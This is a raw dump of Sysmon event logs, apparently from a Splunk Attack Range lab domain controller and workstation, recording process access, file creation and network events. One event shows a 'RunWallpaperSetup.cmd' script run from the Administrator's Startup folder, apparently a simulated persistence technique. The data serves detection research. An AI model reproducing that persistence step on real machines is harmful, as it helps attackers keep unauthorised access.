09:21:59.481{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055945Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.481{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055944Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.481{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055943Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.481{5EBD8912-8D26-6151-8500-00000000FD01}27603956C:\Windows\system32\csrss.exe{5EBD8912-8D37-6151-9B00-00000000FD01}4052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055942Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.481{5EBD8912-8D2A-6151-9600-00000000FD01}46324600C:\Windows\Explorer.EXE{5EBD8912-8D37-6151-9B00-00000000FD01}4052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\windows.storage.dll+ad62a|C:\Windows\System32\windows.storage.dll+ad3e2|C:\Windows\System32\SHELL32.dll+3f8bd|C:\Windows\System32\SHELL32.dll+3e456|C:\Windows\System32\SHELL32.dll+801d1|C:\Windows\System32\SHELL32.dll+6716e|C:\Windows\Explorer.EXE+91a26|C:\Windows\Explorer.EXE+11a0b|C:\Windows\Explorer.EXE+1187e|C:\Windows\Explorer.EXE+f7c2|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 154100x80000000000000001055941Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.486{5EBD8912-8D37-6151-9B00-00000000FD01}4052C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetup.cmd" "C:\Windows\system32\ATTACKRANGE\Administrator{5EBD8912-8D28-6151-085E-080000000000}0x85e082HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 354300x80000000000000001055940Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:57.122{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54208-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001055939Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.028{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BBC77D0721FC71ADC0989EA6605B1C5,SHA256=25443E71634D8B7F56F8E837038636E3C77A3E12C9B9F299E8D0194EA79E47DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980911Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:00.884{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A74BF2361D1D0CCCCC815F0BB92901A,SHA256=8ABC0A65E01EEA3750DC237A7F821252F1A282E4323BBE42691002013ECB4C66,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055983Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:00.982{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055982Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:00.982{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001055981Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:22:00.904{5EBD8912-8D37-6151-9D00-00000000FD01}2644\PSHost.132772081195686961.2644.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001055980Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:00.810{5EBD8912-8D37-6151-9D00-00000000FD01}2644ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_lbc3elgg.bbs.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055979Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:00.810{5EBD8912-8D37-6151-9D00-00000000FD01}2644ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ahzkr0ld.kog.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001055978Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:00.653{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ahzkr0ld.kog.ps12021-09-27 09:22:00.653 10341000x80000000000000001055977Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:00.622{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055976Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:00.544{5EBD8912-8CC0-6151-1100-00000000FD01}412NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=8C4F8B63CF1CBACD2D347079864F86B7,SHA256=DD8D9B9F4BDA051A34FF75FC30A88216C7DC96F49DDAF74E0A49678CE00EFBFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055975Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:00.528{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E0E8476A0043F5213D88227D8FA6306B,SHA256=13D7FE8E5AFDAC642F09841B5D3F4B26F8CD3D20A83450C20F6F638FBC962E96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055974Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:00.528{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A163FAD5C3C42EE4329BD1A5C18BD9D,SHA256=53B991F15E5AA4307CBFDA724F171C470B1D3B894001D96BECAC87A11A679202,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055973Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:00.528{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=525B1E3CDAEBF58E2C39E77613320FE3,SHA256=AF80DD481CF531CFD1FACC42132FB7A7DAAEE673B619841B74B60502D7D8D8E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055993Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:01.951{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=15EF50636F744658D78F59CD69566C23,SHA256=58F83EFCD369170E8281268DC1F49ACD43E76198C14ECAB947FB1C70A22D85C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055992Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:01.888{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8372D6F397EAE33F78EA4294C14069CA,SHA256=24A5DE7D9568913C3B72D3F1D619CD5963A878F5896135C18269FB14814EA2F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055991Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:01.842{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FB182ABA4F3C9D753B668DC9EBA3EB68,SHA256=56DCE8AB6449D282DC91B2B229831783D6263479D6076D2569DB106991C60648,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055990Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:01.794{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6AA66AE3840E6940AE1C0E684AF0922B,SHA256=B4F6E95B3DE22945EFABD03CCE068D69B0C90DB4FBA501D58E7E5C73B45DEE37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055989Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:01.748{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32C597BBB43C99B3CAB48046892E49A4,SHA256=12FB101654EC480489902E963D81ABB606A74882267C3AED98DFBD1CCEF164A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055988Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:01.732{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7CAC7621DB4D1F6A6DE45FD73A3C9424,SHA256=BC7E826A6696AF3B89C1351CF86BF4657EA5610B44C701936C421A7F036D4884,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980913Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:01.884{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83167C56A7CA94CE521D0C7CBE6CF8E9,SHA256=49A943FB9D545B37AFD951CD5E3A4809B20DE87967B01DC087AEA80E2DE65544,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980912Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:58.866{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59518-false10.0.1.12-8000- 23542300x80000000000000001055987Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:01.638{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AA2A882C69112D70770ACE11FF54E63B,SHA256=D6D8C5CE76BFA2914812179142DFB7943AC1AE25F2F5AFEFF7ACF517343D2EFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055986Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:01.607{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B13184B676EE470A23D2D4DC40E34301,SHA256=CF5EA3B6AE2813380EC90620D7ADDEFAC70A013421FB1644C060445CE91B4DD6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055985Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:01.029{5EBD8912-8CC0-6151-1600-00000000FD01}12961944C:\Windows\system32\svchost.exe{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055984Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:01.029{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056015Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.944{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F0D086CEAA9DB630D9626634E50AC54F,SHA256=1375D51A0F631E78EA8DBD772369F5B2EB88D855B1852021D39BD4116806D205,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056014Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.912{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5C7871A12DB1F250BEDC19D24884ED16,SHA256=7C0063E355641032898D8A0D7AF77F0B14FAAFB7A6E5DE7179041542D9C55845,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056013Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.826{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E4B5BEC34EEA5C8C1FB458BEB8769FBC,SHA256=2366CF76C72377207227EDA57122A698C8547E218638D7DB50158CFD3D506570,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056012Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.779{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B6376D4EC49462452B9BA69A7EC4F05A,SHA256=E170AE57DFF408D999FE9F7F05C100A99B18EF68DC042A8A7BC6C8C1B699E13A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056011Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.748{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDA6CD788543D69FBFEE330539B34F8E,SHA256=6CF2FDE8126D783F1E923FE65164FAB72E96621CEC6D78BB9676438DC1377967,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056010Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.732{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=86A97B5E46123D780A45449F14E9E451,SHA256=D12EB938DAD37770E0C03B9849CF2F9C7F17D28DF0506D5DACBDE707D7358EC0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980917Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:59.834{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55166-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980916Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:02.900{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B09705D14AA46C2264A54985786ED44D,SHA256=ECF46F7AAAC0AE9776B86C89CBCA931845B17EC3A39CB4E7EFF464CE71274696,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056009Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.685{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F54D1A81880400F92D2113CAFEAB156D,SHA256=1F6BA5BD725DFD31EE29F79A294652C9A644BA62072814D46802282E597A6594,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056008Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.639{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D9FB83119FC7B928344BB308A3CB6D67,SHA256=14567B6A3AFBD16ADC54D0211F39DC1FBD436657BE5E9A53B706EE5EDAC0DB89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056007Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.592{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9173CA3172832D796E9B42457229C39E,SHA256=F22D0229FE348519787CF1A5626456227F5CF42CF84A55E253A201042BEFA876,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056006Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:02.545{5EBD8912-8CE3-6151-7700-00000000FD01}704NT 